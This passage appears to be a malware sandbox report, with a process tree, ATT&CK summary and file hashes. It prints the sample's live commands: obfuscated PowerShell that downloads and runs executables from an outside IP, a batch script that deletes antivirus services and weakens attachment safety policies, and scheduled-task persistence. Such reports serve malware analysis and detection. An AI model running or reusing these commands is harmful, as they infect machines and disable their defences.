      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 736
      - Program crash
    - [3] C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 788
      - Program crash
    - [3] C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 768
      - Program crash
    - [3] C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 800
      - Program crash
    - [3] C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1008
      - Program crash
    - [3] C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1048
      - Program crash
    - [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
      - Adds Run key to start application
    - [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
      - Blocklisted process makes network request
      - [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: "powershell" Get-MpPreference -verbose
      - [4] C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe", followed by this batch script:

        ```bat
        @echo off
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f
        Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f
        set "osX=%PROCESSOR_ARCHITECTURE%"
        if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64"
        if "%osX%"=="x86" (
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f
        Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f
        ) else (
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32
        Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
        Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64
        Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
        Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64
        )
        ```
- [1] C:\Users\Admin\AppData\Local\Temp\C628.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\C628.exe
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - [2] C:\Users\Admin\AppData\Local\Temp\C628.exe
    Command line: C:\Users\Admin\AppData\Local\Temp\C628.exe
    - Executes dropped EXE
- [1] C:\Users\Admin\AppData\Local\Temp\CF70.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\CF70.exe
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - [2] C:\Users\Admin\AppData\Local\Temp\cheat.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\cheat.exe"
    - Executes dropped EXE
- [1] C:\Users\Admin\AppData\Local\Temp\D25F.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\D25F.exe
  - Executes dropped EXE
  - [2] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 732
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 748
    - Program crash
  - [2] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 668
    - Program crash
  - [2] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 888
    - Program crash
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3612 -s 732
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Program crash
- [1] C:\Users\Admin\AppData\Local\Temp\D399.exe
  Command line: C:\Users\Admin\AppData\Local\Temp\D399.exe
  - Executes dropped EXE
  - [2] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 732
    - Program crash
  - [2] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 748
    - Program crash
  - [2] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 844
    - Program crash
  - [2] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 892
    - Program crash
  - [2] C:\Windows\SysWOW64\WerFault.exe
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3872 -s 856
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Program crash
- [1] C:\Windows\SysWOW64\explorer.exe
  Command line: C:\Windows\SysWOW64\explorer.exe
- [1] C:\Windows\explorer.exe
  Command line: C:\Windows\explorer.exe
- [1] C:\Windows\SysWOW64\explorer.exe
  Command line: C:\Windows\SysWOW64\explorer.exe
- [1] C:\Windows\explorer.exe
  Command line: C:\Windows\explorer.exe
- [1] C:\Windows\SysWOW64\explorer.exe
  Command line: C:\Windows\SysWOW64\explorer.exe
- [1] C:\Windows\explorer.exe
  Command line: C:\Windows\explorer.exe
- [1] C:\Windows\SysWOW64\explorer.exe
  Command line: C:\Windows\SysWOW64\explorer.exe
- [1] C:\Windows\explorer.exe
  Command line: C:\Windows\explorer.exe
- [1] C:\Windows\SysWOW64\explorer.exe
  Command line: C:\Windows\SysWOW64\explorer.exe
- [1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\System32\dhcpcmonitor\dllhost.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
- [1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Users\All Users\Mozilla\updates\308046B0AF4A39CB\smss.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
- [1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Setup Files\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\explorer.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
- [1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\ProgramData\Desktop\Idle.exe'" /rl HIGHEST /f
  - Process spawned unexpected child process
  - Creates scheduled task(s)
- [1] C:\Users\Admin\AppData\Roaming\fajaeit
  Command line: C:\Users\Admin\AppData\Roaming\fajaeit
  - Executes dropped EXE
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
Defense Evasion
- Modify Registry (3)
- Disabling Security Tools (1)
- Virtualization/Sandbox Evasion (1)
- Install Root Certificate (1)
Downloads
-
C:\ProgramData\Data\Database.exe
MD5: 30f0a5fe731fd2735b8c196fd0fe91cf
SHA1: 2eb63724fd11bf8e082bcd99301654111ad0d831
SHA256: 13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
SHA512: acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
C:\ProgramData\Data\install.exe
MD5: 3319cb474eaa2f3812956b271ff29635
SHA1: 74fbed926e8de14fa5eb6a5a47fb873def72fb81
SHA256: 79d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a
SHA512: c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE14D.tmp.WERInternalMetadata.xml
MD5: 8295dff0d171922fc63b36af8d5ded79
SHA1: b71899da9a82a202cdfecf1b1e06bc9e042a930c
SHA256: 00616fe7b38654b63b8a039ac945eff9dd0cffbcd27546a6ddee58532f4c0325
SHA512: ee7c51d00a49d417a9a0eceb26d38cb72ccbd4f1cf6e2bff33918578d3778ea8545d91c0dc6e8c505b5c93761198b8e62cf21ac9cbbaf81da17a5958821debf9
-
C:\ProgramData\Runtimebroker.exe
MD5: 62d1b104b14022206b559167d97f7007
SHA1: cec380a9e863382fc1e37796f2f644a0dc3e3dbc
SHA256: 2917de6c13402e8ed00f0955929a5b131c1624f8261a077a135d08f01c1e71e5
SHA512: 821392e15527f511fa8d0568f5befdbbd10858ec50f400c868d36c062103a8a77bc4188050f954ec560c9f99d275feff9daa484372b379f90ed0c9070944a5d7
-
C:\ProgramData\Systemd\HostData.exe
MD5: cbf26c74a0a12b5f17ba7596ff6ad19f
SHA1: 6dc733432c290f1fbf5ddda2571b7f538445202b
SHA256: 095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983
SHA512: 8a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b
-
C:\ProgramData\Systemd\config.json
MD5: a285ac140c8c6806223bfdc02302173e
SHA1: 06ca61cae058c568860858e49615d04dc4a8820d
SHA256: 36d5713cc13ea15449ab8defc943e42cc657b503a79f0859600ea275598441eb
SHA512: f82eae8304aa9ba504eba0e96468fdac08420b0e158c3263a4f47474b02fb5f751b1bd2335e71a33341d81a495083c7dd8e0479e2c48dbaf6a3f7fefb9f4054b
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
MD5: c558fdaa3884f969f1ec904ae7bbd991
SHA1: b4f85d04f6bf061a17f52c264c065b786cfd33ff
SHA256: 3e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e
SHA512: 6523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5: c8fb24a132990fc219bf4b9389aaca56
SHA1: a40a89c7a2656769a6f92f9cc650695eadd02263
SHA256: 3e6db36517bda522a7f607b14c088bf5c8b88be7c7a16606e3cad64fcb9b6728
SHA512: 7389d43b6e3ccb9255ba219d965e5dddbf34a47e3714afde530c4e68d541ed690e1fe7c18bb6b515e7820ab11e474bdc1860243eb88e82c2c7a8038c621770f0
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
MD5: f728dea87c5e5f116f544678b78c52a9
SHA1: 884dc3610641c7344d5988600b373f286639c50d
SHA256: 3643d4c5a065cf65ee34c509615866b8e3e4d71f3beb8711354e5e6a8ebee790
SHA512: b8cf42bea9019b09a603aa697e69d2a74e997123d8fde3bd2f41876788705b357a063f48f144ea9b86330a9ebc5cf4096bd052530a5071a464a3b241710f5a07
-
C:\Users\Admin\AppData\Local\Temp\AEE3.exe
MD5: a69e12607d01237460808fa1709e5e86
SHA1: 4a12f82aee1c90e70cdf6be863ce1a749c8ae411
SHA256: 188e05efb42c1f7fdb5c910a6614f710a87ae642b23ac9ffe3f75246744865bc
SHA512: 7533e6da6bac0405fc8b608da8020b54b6ee02592e6fd40ea342e130a8a876ae5ef4a1fd636d95e76339dbf8be45cecbd22ca2d0a4635b055ffafec3d7e15284
-
C:\Users\Admin\AppData\Local\Temp\B472.exe
MD5: e987477b0d14b6d7075f0105aa28ba92
SHA1: 54bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
SHA256: 4fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
SHA512: bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
-
C:\Users\Admin\AppData\Local\Temp\BD9B.exe
MD5: 49f58a80993170b4351014d0b5068897
SHA1: 7af2615ec10821cbefb55c602b270c27fa1d6806
SHA256: 905f70426483e7dc4e4d2110cfa0f3a3bbac1ee16a74e287cd51cae0e0babd1c
SHA512: 2ee7f30ee68bbc9da4f3858d1eb188be3fca547f63b36864181b86a70ea5d06f614fdb38b42a22aff24e8d4d720f814b6b103e52d5c01c399eefd28775f88ae2
-
C:\Users\Admin\AppData\Local\Temp\C1B3.exe
MD5: 62d1b104b14022206b559167d97f7007
SHA1: cec380a9e863382fc1e37796f2f644a0dc3e3dbc
SHA256: 2917de6c13402e8ed00f0955929a5b131c1624f8261a077a135d08f01c1e71e5
